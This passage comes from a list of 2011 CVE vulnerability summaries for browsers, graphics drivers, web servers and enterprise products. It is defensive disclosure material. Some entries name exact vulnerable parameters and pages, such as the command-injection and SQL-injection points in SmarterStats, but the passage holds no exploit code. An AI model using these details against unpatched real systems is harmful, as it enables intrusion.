page, as demonstrated by live.com. [CVE-2011-2622] Unspecified vulnerability in the Web Workers implementation in Opera before 11.50 allows remote attackers to cause a denial of service (application crash) via unknown vectors. [CVE-2011-2618] Opera before 11.50 allows remote attackers to cause a denial of service (application crash) via web script that moves a (1) AUDIO element or (2) VIDEO element between windows. [CVE-2011-2616] Unspecified vulnerability in Opera before 11.50 allows remote attackers to cause a denial of service (memory consumption) via unknown content on a web page, as demonstrated by test262.ecmascript.org. [CVE-2011-2615] Unspecified vulnerability in Opera before 11.50 allows remote attackers to cause a denial of service (application hang) via unknown content on a web page, as demonstrated by domiteca.com. [CVE-2011-2612] Unspecified vulnerability in Opera before 11.50 allows remote attackers to cause a denial of service (application crash) via unknown content on a web page, as demonstrated by progorod.ru. [CVE-2011-2611] Unspecified vulnerability in the printing functionality in Opera before 11.50 allows user-assisted remote attackers to cause a denial of service (application crash) via a crafted web page. [CVE-2011-2609] Opera before 11.50 does not properly restrict data: URIs, which makes it easier for remote attackers to conduct cross-site scripting (XSS) attacks via a crafted web site. [CVE-2011-2607] Cross-site scripting (XSS) vulnerability in IBM Rational Team Concert (RTC) 3.0 allows remote attackers to inject arbitrary web script or HTML via an unspecified parameter, aka Work Item 165513. [CVE-2011-2606] Cross-site scripting (XSS) vulnerability in the Web UI in IBM Rational Team Concert (RTC) 3.0 allows remote attackers to inject arbitrary web script or HTML via an unspecified parameter, aka Work Item 165511. [CVE-2011-2604] The Intel G41 driver 6.14.10.5355 on Windows XP SP3 allows remote attackers to cause a denial of service (system crash) via a crafted web page that is visited with Google Chrome or Mozilla Firefox, as demonstrated by the lots-of-polys-example.html test page in the Khronos WebGL SDK. [CVE-2011-2603] The NVIDIA 9400M driver 6.2.6 on Mac OS X 10.6.7 allows remote attackers to cause a denial of service (desktop hang) via a crafted web page that is visited with Google Chrome or Mozilla Firefox, as demonstrated by the lots-of-polys-example.html test page in the Khronos WebGL SDK. [CVE-2011-2602] The NVIDIA Geforce 310 driver 6.14.12.7061 on Windows XP SP3 allows remote attackers to cause a denial of service (system crash) via a crafted web page that is visited with Google Chrome or Mozilla Firefox, as demonstrated by the lots-of-polys-example.html test page in the Khronos WebGL SDK. [CVE-2011-2601] The GPU support functionality in Mac OS X does not properly restrict rendering time, which allows remote attackers to cause a denial of service (desktop hang) via vectors involving WebGL and (1) shader programs or (2) complex 3D geometry, as demonstrated by using Mozilla Firefox or Google Chrome to visit the lots-of-polys-example.html test page in the Khronos WebGL SDK. [CVE-2011-2600] The GPU support functionality in Windows XP does not properly restrict rendering time, which allows remote attackers to cause a denial of service (system crash) via vectors involving WebGL and (1) shader programs or (2) complex 3D geometry, as demonstrated by using Mozilla Firefox or Google Chrome to visit the lots-of-polys-example.html test page in the Khronos WebGL SDK. [CVE-2011-2599] Google Chrome 11 does not block use of a cross-domain image as a WebGL texture, which allows remote attackers to obtain approximate copies of arbitrary images via a timing attack involving a crafted WebGL fragment shader. [CVE-2011-2598] The WebGL implementation in Mozilla Firefox 4.x allows remote attackers to obtain screenshots of the windows of arbitrary desktop applications via vectors involving an SVG filter, an IFRAME element, and uninitialized data in graphics memory. [CVE-2011-2578] Memory leak in Cisco IOS 15.1 and 15.2 allows remote attackers to cause a denial of service (memory consumption) via malformed SIP packets on a NAT interface, aka Bug ID CSCts12366. [CVE-2011-2545] Cross-site scripting (XSS) vulnerability in the SIP implementation on the Cisco SPA8000 and SPA8800 before 6.1.11, SPA2102 and SPA3102 before 5.2.13, and SPA 500 series IP phones before 7.4.9 allows remote attackers to inject arbitrary web script or HTML via the FROM field of an INVITE message, aka Bug IDs CSCtr27277, CSCtr27256, CSCtr27274, and CSCtr14715. [CVE-2011-2526] Apache Tomcat 5.5.x before 5.5.34, 6.x before 6.0.33, and 7.x before 7.0.19, when sendfile is enabled for the HTTP APR or HTTP NIO connector, does not validate certain request attributes, which allows local users to bypass intended file access restrictions or cause a denial of service (infinite loop or JVM crash) by leveraging an untrusted web application. [CVE-2011-2522] Multiple cross-site request forgery (CSRF) vulnerabilities in the Samba Web Administration Tool (SWAT) in Samba 3.x before 3.5.10 allow remote attackers to hijack the authentication of administrators for requests that (1) shut down daemons, (2) start daemons, (3) add shares, (4) remove shares, (5) add printers, (6) remove printers, (7) add user accounts, or (8) remove user accounts, as demonstrated by certain start, stop, and restart parameters to the status program. [CVE-2011-2510] Cross-site scripting (XSS) vulnerability in the RSS embedding feature in DokuWiki before 2011-05-25a Rincewind allows remote attackers to inject arbitrary web script or HTML via a link. [CVE-2011-2509] Multiple cross-site scripting (XSS) vulnerabilities in Joomla! before 1.6.4 allow remote attackers to inject arbitrary web script or HTML via (1) the query string to the com_contact component, as demonstrated by the Itemid parameter to index.php [CVE-2011-2481] Apache Tomcat 7.0.x before 7.0.17 permits web applications to replace an XML parser used for other web applications, which allows local users to read or modify the (1) web.xml, (2) context.xml, or (3) tld files of arbitrary web applications via a crafted application that is loaded earlier than the target application. NOTE: this vulnerability exists because of a CVE-2009-0783 regression. [CVE-2011-2477] Multiple cross-site scripting (XSS) vulnerabilities in config.c in config.cgi in Icinga before 1.4.1, when escape_html_tags is disabled, allow remote attackers to inject arbitrary web script or HTML via a JavaScript expression, as demonstrated by the onload attribute of a BODY element located after a check-host-alive! sequence, a different vulnerability than CVE-2011-2179. [CVE-2011-2476] Cross-site scripting (XSS) vulnerability in Coppermine Photo Gallery (CPG) before 1.5.12 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, a different vulnerability than CVE-2010-4667. [CVE-2011-2470] Cross-site scripting (XSS) vulnerability in chat/base/admin/login.php in A Really Simple Chat (ARSC) 3.3-rc2 allows remote attackers to inject arbitrary web script or HTML via the arsc_message parameter. [CVE-2011-2463] Cross-site scripting (XSS) vulnerability in Adobe ColdFusion 8.0 through 9.0.1 allows remote attackers to inject arbitrary web script or HTML via vectors involving the cfform tag. [CVE-2011-2461] Cross-site scripting (XSS) vulnerability in the Adobe Flex SDK 3.x and 4.x before 4.6 allows remote attackers to inject arbitrary web script or HTML via vectors related to the loading of modules from different domains. [CVE-2011-2458] Adobe Flash Player before 10.3.183.11 and 11.x before 11.1.102.55 on Windows, Mac OS X, Linux, and Solaris and before 11.1.102.59 on Android, and Adobe AIR before 3.1.0.4880, when Internet Explorer is used, allows remote attackers to bypass the cross-domain policy via a crafted web site. [CVE-2011-2444] Cross-site scripting (XSS) vulnerability in Adobe Flash Player before 10.3.183.10 on Windows, Mac OS X, Linux, and Solaris, and before 10.3.186.7 on Android, allows remote attackers to inject arbitrary web script or HTML via a crafted URL, related to a "universal cross-site scripting issue," as exploited in the wild in September 2011. [CVE-2011-2410] Cross-site scripting (XSS) vulnerability in HP OpenView Performance Insight 5.3, 5.31, 5.4, 5.41, 5.41.001, and 5.41.002 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2011-2409] Cross-site scripting (XSS) vulnerability in the Calendar application in HP Palm webOS 3.x before 3.0.2 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2011-2408] Cross-site scripting (XSS) vulnerability in the Contacts application in HP Palm webOS 3.x before 3.0.2 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2011-2406] Cross-site scripting (XSS) vulnerability in HP OpenView Performance Insight 5.3, 5.31, 5.4, 5.41, 5.41.001, and 5.41.002 allows remote authenticated users to inject arbitrary web script or HTML via unspecified vectors. [CVE-2011-2402] Cross-site scripting (XSS) vulnerability in HP Network Automation 7.2x, 7.5x, 7.6x, 9.0, and 9.10 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2011-2401] Session fixation vulnerability in HP SiteScope 9.x, 10.x, and 11.x allows remote attackers to hijack web sessions via unspecified vectors. [CVE-2011-2400] Cross-site scripting (XSS) vulnerability in HP SiteScope 9.x, 10.x, and 11.x allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2011-2385] The iPhoneHandle package 0.9.x before 0.9.7 and 1.0.x before 1.0.3 in Open Ticket Request System (OTRS) does not properly restrict use of the iPhoneHandle interface, which allows remote authenticated users to gain privileges, and consequently read or modify OTRS core objects, via unspecified vectors. [CVE-2011-2379] Cross-site scripting (XSS) vulnerability in Bugzilla 2.4 through 2.22.7, 3.0.x through 3.3.x, 3.4.x before 3.4.12, 3.5.x, 3.6.x before 3.6.6, 3.7.x, 4.0.x before 4.0.2, and 4.1.x before 4.1.3, when Internet Explorer before 9 or Safari before 5.0.6 is used for Raw Unified mode, allows remote attackers to inject arbitrary web script or HTML via a crafted patch, related to content sniffing. [CVE-2011-2372] Mozilla Firefox before 3.6.23 and 4.x through 6, Thunderbird before 7.0, and SeaMonkey before 2.4 do not prevent the starting of a download in response to the holding of the Enter key, which allows user-assisted remote attackers to bypass intended access restrictions via a crafted web site. [CVE-2011-2369] Cross-site scripting (XSS) vulnerability in Mozilla Firefox 4.x through 4.0.1 allows remote attackers to inject arbitrary web script or HTML via an SVG element containing an HTML-encoded entity. [CVE-2011-2368] The WebGL implementation in Mozilla Firefox 4.x through 4.0.1 does not properly restrict write operations, which allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via unspecified vectors. [CVE-2011-2367] The WebGL implementation in Mozilla Firefox 4.x through 4.0.1 does not properly restrict read operations, which allows remote attackers to obtain sensitive information from GPU memory associated with an arbitrary process, or cause a denial of service (application crash), via unspecified vectors. [CVE-2011-2366] Mozilla Gecko before 5.0, as used in Firefox before 5.0 and Thunderbird before 5.0, does not block use of a cross-domain image as a WebGL texture, which allows remote attackers to obtain approximate copies of arbitrary images via a timing attack involving a crafted WebGL fragment shader. [CVE-2011-2362] Mozilla Firefox before 3.6.18, Thunderbird before 3.1.11, and SeaMonkey through 2.0.14 do not distinguish between cookies for two domain names that differ only in a trailing dot, which allows remote web servers to bypass the Same Origin Policy via Set-Cookie headers. [CVE-2011-2361] The Basic Authentication dialog implementation in Google Chrome before 13.0.782.107 does not properly handle strings, which might make it easier for remote attackers to capture credentials via a crafted web site. [CVE-2011-2360] Google Chrome before 13.0.782.107 does not ensure that the user is prompted before download of a dangerous file, which makes it easier for remote attackers to bypass intended content restrictions via a crafted web site. [CVE-2011-2356] WebKit, as used in Apple iTunes before 10.5, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other CVEs listed in APPLE-SA-2011-10-11-1. [CVE-2011-2354] WebKit, as used in Apple iTunes before 10.5, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other CVEs listed in APPLE-SA-2011-10-11-1. [CVE-2011-2352] WebKit, as used in Apple iTunes before 10.5, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other CVEs listed in APPLE-SA-2011-10-11-1. [CVE-2011-2344] Android Picasa in Android 3.0 and 2.x through 2.3.4 uses a cleartext HTTP session when transmitting the authToken obtained from ClientLogin, which allows remote attackers to gain privileges and access private pictures and web albums by sniffing the token from connections with picasaweb.google.com. [CVE-2011-2341] WebKit, as used in Apple iTunes before 10.5, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other CVEs listed in APPLE-SA-2011-10-11-1. [CVE-2011-2339] WebKit, as used in Apple iTunes before 10.5, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other CVEs listed in APPLE-SA-2011-10-11-1. [CVE-2011-2338] WebKit, as used in Apple iTunes before 10.5, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other CVEs listed in APPLE-SA-2011-10-11-1. [CVE-2011-2320] Unspecified vulnerability in the Oracle WebLogic Server component in Oracle Fusion Middleware 9.2.4.0, 10.0.2.0, 10.3.3.0, 10.3.4.0, and 10.3.5.0 allows remote attackers to affect confidentiality via unknown vectors related to Web Services. [CVE-2011-2319] Unspecified vulnerability in the Oracle WebLogic Server component in Oracle Fusion Middleware 9.2.4.0, 10.0.2.0, 10.3.3.0, 10.3.4.0, and 10.3.5.0 allows remote attackers to affect confidentiality, related to JMS. [CVE-2011-2318] Unspecified vulnerability in the Oracle WebLogic Server component in Oracle Fusion Middleware 9.2.4.0, 10.0.2.0, 10.3.3.0, 10.3.4.0, and 10.3.5.0 allows local users to affect confidentiality, related to WLS Security. [CVE-2011-2297] Unspecified vulnerability in Oracle Solaris Cluster 3.3 allows local users to affect confidentiality, integrity, and availability via unknown vectors related to Data Service for WebLogic Server. [CVE-2011-2255] Unspecified vulnerability in the Oracle WebLogic Portal component in Oracle Fusion Middleware 9.2.3.0, 10.0.1.0, 10.2.1.0, and 10.3.2.0 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors. [CVE-2011-2237] Unspecified vulnerability in the Oracle Web Services Manager component in Oracle Fusion Middleware 10.1.3.5.0 and 10.1.3.5.1 allows remote authenticated users to affect integrity, related to WSM Console. [CVE-2011-2227] Cross-site scripting (XSS) vulnerability in Novell Identity Manager (aka IDM) User Application 3.5.0, 3.5.1, 3.6.0, 3.6.1, 3.7.0, and 4.0.0, and Identity Manager Roles Based Provisioning Module 3.6.0, 3.6.1, 3.7.0, and 4.0.0, allows remote attackers to inject arbitrary web script or HTML via the apwaDetail (aka apwaDetailId) parameter, aka Bug 709603. [CVE-2011-2226] Cross-site scripting (XSS) vulnerability in Kiwi before 3.74.2, as used in SUSE Studio 1.1 before 1.1.4, allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, related to a pattern listing. [CVE-2011-2222] Session fixation vulnerability in WebAdmin in the Mobility Pack before 1.2 in Novell Data Synchronizer 1.x through 1.1.2 build 428 allows remote attackers to hijack web sessions via unspecified vectors. [CVE-2011-2221] The Mobility Pack before 1.2 in Novell Data Synchronizer 1.x through 1.1.2 build 428 allows remote attackers to bypass WebAdmin authentication and obtain sensitive GroupWise information via unspecified vectors. [CVE-2011-2180] Cross-site scripting (XSS) vulnerability in dereferer.php in A Really Simple Chat (ARSC) 3.3-rc2 allows remote attackers to inject arbitrary web script or HTML via the arsc_link parameter. [CVE-2011-2179] Multiple cross-site scripting (XSS) vulnerabilities in config.c in config.cgi in (1) Nagios 3.2.3 and (2) Icinga before 1.4.1 allow remote attackers to inject arbitrary web script or HTML via the expand parameter, as demonstrated by an (a) command action or a (b) hosts action. [CVE-2011-2173] The implementation of OutputMediator objects in IBM WebSphere Portal 6.0.1.7, and 7.0.0.1 before CF002, allows remote authenticated users to cause a denial of service (memory consumption) via requests. [CVE-2011-2172] Cross-site scripting (XSS) vulnerability in the search center in IBM WebSphere Portal 7.0.0.1 before CF004 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2011-2159] The SmarterTools SmarterStats 6.0 web server omits the Content-Type header for certain resources, which might allow remote attackers to have an unspecified impact by leveraging an interpretation conflict involving (1) Admin/Defaults/frmDefaultSiteSettings.aspx, (2) Admin/Defaults/frmServerDefaults.aspx, (3) Admin/frmReportSettings.aspx, (4) Admin/frmSite.aspx, (5) App_Themes/Default/ButtonBarIcons.xml, (6) App_Themes/Default/Skin.xml, (7) Client/frmImportSettings.aspx, (8) Client/frmSeoSettings.aspx, (9) Services/Web.config, (10) aspnet_client/system_web/4_0_30319/, (11) clientaccesspolicy.xml, (12) cloudscan.exe, (13) crossdomain.xml, or (14) sitemap.xml. NOTE: it is possible that only clients, not the SmarterStats product, could be affected by this issue. [CVE-2011-2158] The SmarterTools SmarterStats 6.0 web server sends incorrect Content-Type headers for certain resources, which might allow remote attackers to have an unspecified impact by leveraging an interpretation conflict involving (1) Admin/frmSite.aspx, (2) Admin/frmSites.aspx, (3) Admin/frmViewReports.aspx, (4) App_Themes/AboutThisFolder.txt, (5) Client/frmViewReports.aspx, (6) Temp/AboutThisFolder.txt, (7) default.aspx, (8) login.aspx, or (9) certain .jpg URIs under Temp/. NOTE: it is possible that only clients, not the SmarterStats product, could be affected by this issue. [CVE-2011-2157] The (1) Admin/frmEmailReportSettings.aspx and (2) Admin/frmGeneralSettings.aspx components in the SmarterTools SmarterStats 6.0 web server generate web pages containing e-mail addresses, which allows remote attackers to obtain potentially sensitive information by reading the default values of form fields. [CVE-2011-2156] The SmarterTools SmarterStats 6.0 web server allows remote attackers to obtain directory listings via a direct request for the (1) Admin/, (2) Admin/Defaults/, (3) Admin/GettingStarted/, (4) Admin/Popups/, (5) App_Themes/, (6) Client/, (7) Client/Popups/, (8) Services/, (9) Temp/, (10) UserControls/, (11) UserControls/PanelBarTemplates/, (12) UserControls/Popups/, (13) aspnet_client/, or (14) aspnet_client/system_web/ directory name, or (15) certain directory names under App_Themes/Default/. [CVE-2011-2155] Login.aspx in the SmarterTools SmarterStats 6.0 web server generates a ctl00$MPH$txtPassword password form field without disabling the autocomplete feature, which makes it easier for remote attackers to bypass authentication by leveraging an unattended workstation. [CVE-2011-2154] login.aspx in the SmarterTools SmarterStats 6.0 web server does not include the HTTPOnly flag in a Set-Cookie header for the loginsettings cookie, which makes it easier for remote attackers to obtain potentially sensitive information via script access to this cookie. [CVE-2011-2153] Login.aspx in the SmarterTools SmarterStats 6.0 web server supports URLs containing txtUser and txtPass parameters in the query string, which makes it easier for context-dependent attackers to discover credentials by reading (1) web-server access logs, (2) web-server Referer logs, or (3) the browser history, related to a "cross-domain Referer leakage" issue. [CVE-2011-2152] The SmarterTools SmarterStats 6.0 web server generates web pages containing external links in response to GET requests with query strings for (1) Client/frmViewReports.aspx or (2) UserControls/Popups/frmHelp.aspx, which makes it easier for remote attackers to obtain sensitive information by reading (a) web-server access logs or (b) web-server Referer logs, related to a "cross-domain Referer leakage" issue. [CVE-2011-2151] The (1) Admin/frmEmailReportSettings.aspx, (2) Admin/frmGeneralSettings.aspx, (3) Admin/frmSite.aspx, (4) Client/frmUser.aspx, and (5) Login.aspx components in the SmarterTools SmarterStats 6.0 web server accept cleartext passwords, which makes it easier for remote attackers to obtain sensitive information by sniffing the network. [CVE-2011-2150] The SmarterTools SmarterStats 6.0 web server does not properly validate string data that is intended for storage in an XML document, which allows remote attackers to cause a denial of service (parsing error and daemon pause) via vectors involving (1) certain cookies in a SiteInfoLookup action to Admin/frmSites.aspx, or certain (2) cookies or (3) parameters to (a) Client/frmViewOverviewReport.aspx, (b) Client/frmViewReports.aspx, or (c) Services/SiteAdmin.asmx, as demonstrated by a ]]>> string, related to an "XML injection" issue. [CVE-2011-2149] Multiple SQL injection vulnerabilities in the SmarterTools SmarterStats 6.0 web server allow remote attackers to execute arbitrary SQL commands via certain parameters to (1) Admin/frmSite.aspx, (2) Default.aspx, (3) Services/SiteAdmin.asmx, or (4) Client/frmViewReports.aspx [CVE-2011-2148] Admin/frmSite.aspx in the SmarterTools SmarterStats 6.0 web server allows remote attackers to execute arbitrary commands via vectors involving a leading and trailing & (ampersand) character, and (1) an STTTState cookie, (2) the ctl00%24MPH%24txtAdminNewPassword_SettingText parameter, (3) the ctl00%24MPH%24txtSmarterLogDirectory parameter, (4) the ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2414 parameter, (5) the ctl00%24MPH%24ucSiteSeoSettings%24txtSeoMaxKeywords_SettingText parameter, or (6) the ctl00_MPH_grdLogLocations_HiddenLSR parameter, related to an "OS command injection" issue. [CVE-2011-2142] The Web Client Service in IBM Datacap Taskmaster Capture 8.0.1 before FP1 requires a cleartext password, which has unspecified impact and attack vectors. [CVE-2011-2141] SQL injection vulnerability in TMWeb in IBM Datacap Taskmaster Capture 8.0.1 before FP1 allows remote attackers to execute arbitrary SQL commands via unspecified vectors. [CVE-2011-2133] Cross-site scripting (XSS) vulnerability in Adobe RoboHelp 8 and 9 before 9.0.1.262, and RoboHelp Server 8 and 9, allows remote attackers to inject arbitrary web script or HTML via the URI, related to template_stock/whutils.js. [CVE-2011-2107] Cross-site scripting (XSS) vulnerability in Adobe Flash Player before 10.3.181.22 on Windows, Mac OS X, Linux, and Solaris, and 10.3.185.22 and earlier on Android, allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, related to a "universal cross-site scripting vulnerability." [CVE-2011-2089] Stack-based buffer overflow in the SetActiveXGUID method in the VersionInfo ActiveX control in GenVersion.dll 8.0.138.0 in the WebHMI subsystem in ICONICS BizViz 9.x before 9.22 and GENESIS32 9.x before 9.22 allows remote attackers to execute arbitrary code via a long string in the argument. NOTE: some of these details are obtained from third party information. [CVE-2011-2088] XWork 2.2.1 in Apache Struts 2.2.1, and OpenSymphony XWork in OpenSymphony WebWork, allows remote attackers to obtain potentially sensitive information about internal Java class paths via vectors involving an s:submit element and a nonexistent method, a different vulnerability than CVE-2011-1772.3. [CVE-2011-2087] Multiple cross-site scripting (XSS) vulnerabilities in component handlers in the javatemplates (aka Java Templates) plugin in Apache Struts 2.x before 2.2.3 allow remote attackers to inject arbitrary web script or HTML via an arbitrary parameter value to a .action URI, related to improper handling of value attributes in (1) FileHandler.java, (2) HiddenHandler.java, (3) PasswordHandler.java, (4) RadioHandler.java, (5) ResetHandler.java, (6) SelectHandler.java, (7) SubmitHandler.java, and (8) TextFieldHandler.java. [CVE-2011-2083] Multiple cross-site scripting (XSS) vulnerabilities in Best Practical Solutions RT 3.x before 3.8.12 and 4.x before 4.0.6 allow remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2011-2077] The default configuration of the New Atlanta BlueDragon administrative interface in MediaCAST 8 and earlier enables external TCP connections to port 10000, instead of connections only from 127.0.0.1, which makes it easier for remote attackers to have an unspecified impact via a TCP session. [CVE-2011-2060] The platform-sw component on Cisco Adaptive Security Appliances (ASA) 5500 series devices with software 8.2 before 8.2(5.3), 8.3 before 8.3(2.20), and 8.4 before 8.4(2.1) does not properly handle non-ASCII characters in an interface description, which allows local users to cause a denial of service (reload without configuration) via a crafted description, aka Bug ID CSCtq50523. [CVE-2011-2041] The Start Before Logon (SBL) functionality in Cisco AnyConnect Secure Mobility Client (formerly AnyConnect VPN Client) before 2.3.254 on Windows, and on Windows Mobile, allows local users to gain privileges via unspecified user-interface interaction, aka Bug ID CSCta40556. [CVE-2011-2039] The helper application in Cisco AnyConnect Secure Mobility Client (formerly AnyConnect VPN Client) before 2.3.185 on Windows, and on Windows Mobile, downloads a client executable file (vpndownloader.exe) without verifying its authenticity, which allows remote attackers to execute arbitrary code via the url property to a certain ActiveX control in vpnweb.ocx, aka Bug ID CSCsy00904. [CVE-2011-2023] Cross-site scripting (XSS) vulnerability in functions/mime.php in SquirrelMail before 1.4.22 allows remote attackers to inject arbitrary web script or HTML via a crafted STYLE element in an e-mail message. [CVE-2011-2021] Session fixation vulnerability in TIBCO iProcess Engine before 11.1.3 and iProcess Workspace before 11.3.1 allows remote attackers to hijack web sessions via unspecified vectors. [CVE-2011-2020] Cross-site scripting (XSS) vulnerability in TIBCO iProcess Engine before 11.1.3 and iProcess Workspace before 11.3.1 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2011-1984] WINS in Microsoft Windows Server 2003 SP2 and Server 2008 SP2, R2, and R2 SP1 allows local users to gain privileges by sending crafted packets over the loopback interface, aka "WINS Local Elevation of Privilege Vulnerability." [CVE-2011-1976] Cross-site scripting (XSS) vulnerability in the Report Viewer Control in Microsoft Visual Studio 2005 SP1 and Report Viewer 2005 SP1 allows remote attackers to inject arbitrary web script or HTML via a parameter in a data source, aka "Report Viewer Controls XSS Vulnerability." [CVE-2011-1965] Tcpip.sys in the TCP/IP stack in Microsoft Windows 7 Gold and SP1 and Windows Server 2008 R2 and R2 SP1 does not properly implement URL-based QoS, which allows remote attackers to cause a denial of service (reboot) via a crafted URL to a web server, aka "TCP/IP QOS Denial of Service Vulnerability." [CVE-2011-1962] Microsoft Internet Explorer 6 through 9 does not properly handle unspecified character sequences, which allows remote attackers to read content from a different (1) domain or (2) zone via a crafted web site that triggers "inactive filtering," aka "Shift JIS Character Encoding Vulnerability." [CVE-2011-1961] The telnet URI handler in Microsoft Internet Explorer 6 through 9 does not properly launch the handler application, which allows remote attackers to execute arbitrary programs via a crafted web site, aka "Telnet Handler Remote Code Execution Vulnerability." [CVE-2011-1954] Multiple cross-site request forgery (CSRF) vulnerabilities in Post Revolution 0.8.0c-2 and earlier allow remote attackers to hijack the authentication of arbitrary users for requests to (1) ajax-weblog-guardar.php, (2) verpost.php, (3) comments.php, or (4) perfil.php. [CVE-2011-1953] Multiple cross-site scripting (XSS) vulnerabilities in common.php in Post Revolution before 0.8.0c-2 allow remote attackers to inject arbitrary web script or HTML via an attribute of a (1) P, a (2) STRONG, a (3) A, a (4) EM, a (5) I, a (6) IMG, a (7) LI, an (8) OL, a (9) VIDEO, or a (10) BLOCKQUOTE element. [CVE-2011-1949] Cross-site scripting (XSS) vulnerability in the safe_html filter in Products.PortalTransforms in Plone 2.1 through 4.1 allows remote authenticated users to inject arbitrary web script or HTML via unspecified vectors, a different vulnerability than CVE-2010-2422. [CVE-2011-1948] Cross-site scripting (XSS) vulnerability in Plone 4.1 and earlier allows remote attackers to inject arbitrary web script or HTML via a crafted URL. [CVE-2011-1941] Open redirect vulnerability in the redirector feature in phpMyAdmin 3.4.x before 3.4.1 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via unspecified vectors. [CVE-2011-1940] Multiple cross-site scripting (XSS) vulnerabilities in phpMyAdmin 3.3.x before 3.3.10.1 and 3.4.x before 3.4.1 allow remote attackers to inject arbitrary web script or HTML via a crafted table name that triggers improper HTML rendering on a Tracking page, related to (1) libraries/tbl_links.inc.php and (2) tbl_tracking.php. [CVE-2011-1937] Cross-site scripting (XSS) vulnerability in Webmin 1.540 and earlier allows local users to inject arbitrary web script or HTML via a chfn command that changes the real (aka Full Name) field, related to useradmin/index.cgi and useradmin/user-lib.pl. [CVE-2011-1928] The fnmatch implementation in apr_fnmatch.c in the Apache Portable Runtime (APR) library 1.4.3 and 1.4.4, and the Apache HTTP Server 2.2.18, allows remote attackers to cause a denial of service (infinite loop) via a URI that does not match unspecified types of wildcard patterns, as demonstrated by attacks against mod_autoindex in httpd when a //WEB-INF/ configuration pattern is used. NOTE: this issue exists because of an incorrect fix for CVE-2011-0419. [CVE-2011-1922] daemon/worker.c in Unbound 1.x before 1.4.10, when debugging functionality and the interface-automatic option are enabled, allows remote attackers to cause a denial of service (assertion failure and daemon exit) via a crafted DNS request that triggers improper error handling. [CVE-2011-1906] Trustwave WebDefend Enterprise before 5.0 7.01.903-1.4 stores specific user-account credentials in a MySQL database, which makes it easier for remote attackers to read the event collection table via requests to the management port, a different vulnerability than CVE-2011-0756. [CVE-2011-1900] Directory traversal vulnerability in NTWebServer in InduSoft Web Studio 6.1 and 7.x before 7.0+Patch 1 allows remote attackers to execute arbitrary code via an invalid request. [CVE-2011-1899] Multiple cross-site scripting (XSS) vulnerabilities in CA eHealth 6.0.x, 6.1.x, 6.2.1, and 6.2.2 allow remote attackers to inject arbitrary web script or HTML via unspecified parameters. [CVE-2011-1897] Cross-site scripting (XSS) vulnerability in Microsoft Forefront Unified Access Gateway (UAG) 2010 Gold, Update 1, Update 2, and SP1 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, aka "Default Reflected XSS Vulnerability." [CVE-2011-1896] Cross-site scripting (XSS) vulnerability in Microsoft Forefront Unified Access Gateway (UAG) 2010 Gold, Update 1, Update 2, and SP1 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, aka "ExcelTable Reflected XSS Vulnerability." [CVE-2011-1894] The MHTML protocol handler in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 does not properly handle a MIME format in a request for embedded content in an HTML document, which allows remote attackers to conduct cross-site scripting (XSS) attacks via a crafted EMBED element in a web page that is visited in Internet Explorer, aka "MHTML Mime-Formatted Request Vulnerability." [CVE-2011-1893] Cross-site scripting (XSS) vulnerability in Microsoft Office SharePoint Server 2010, Windows SharePoint Services 2.0 and 3.0 SP2, and SharePoint Foundation 2010 allows remote attackers to inject arbitrary web script or HTML via the URI, aka "SharePoint XSS Vulnerability." [CVE-2011-1892] Microsoft Office Groove 2007 SP2, SharePoint Workspace 2010 Gold and SP1, Office Forms Server 2007 SP2, Office SharePoint Server 2007 SP2, Office SharePoint Server 2010 Gold and SP1, Office Groove Data Bridge Server 2007 SP2, Office Groove Management Server 2007 SP2, Groove Server 2010 Gold and SP1, Windows SharePoint Services 3.0 SP2, SharePoint Foundation 2010, and Office Web Apps 2010 Gold and SP1 do not properly handle Web Parts containing XML classes referencing external entities, which allows remote authenticated users to read arbitrary files via a crafted XML and XSL file, aka "SharePoint Remote File Disclosure Vulnerability." [CVE-2011-1891] Cross-site scripting (XSS) vulnerability in Microsoft Windows SharePoint Services 3.0 SP2, and SharePoint Foundation 2010 Gold and SP1, allows remote attackers to inject arbitrary web script or HTML via unspecified parameters in a request to a script, aka "Contact Details Reflected XSS Vulnerability." [CVE-2011-1890] Cross-site scripting (XSS) vulnerability in EditForm.aspx in Microsoft Office SharePoint Server 2010 and SharePoint Foundation 2010 allows remote attackers to inject arbitrary web script or HTML via a post, aka "Editform Script Injection Vulnerability." [CVE-2011-1862] Cross-site scripting (XSS) vulnerability in HP Service Manager 7.02, 7.11, 9.20, and 9.21 and Service Center 6.2.8 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2011-1856] Cross-site scripting (XSS) vulnerability in HP Business Availability Center (BAC) 8.06 and earlier allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2011-1841] Cross-site scripting (XSS) vulnerability in the link_to 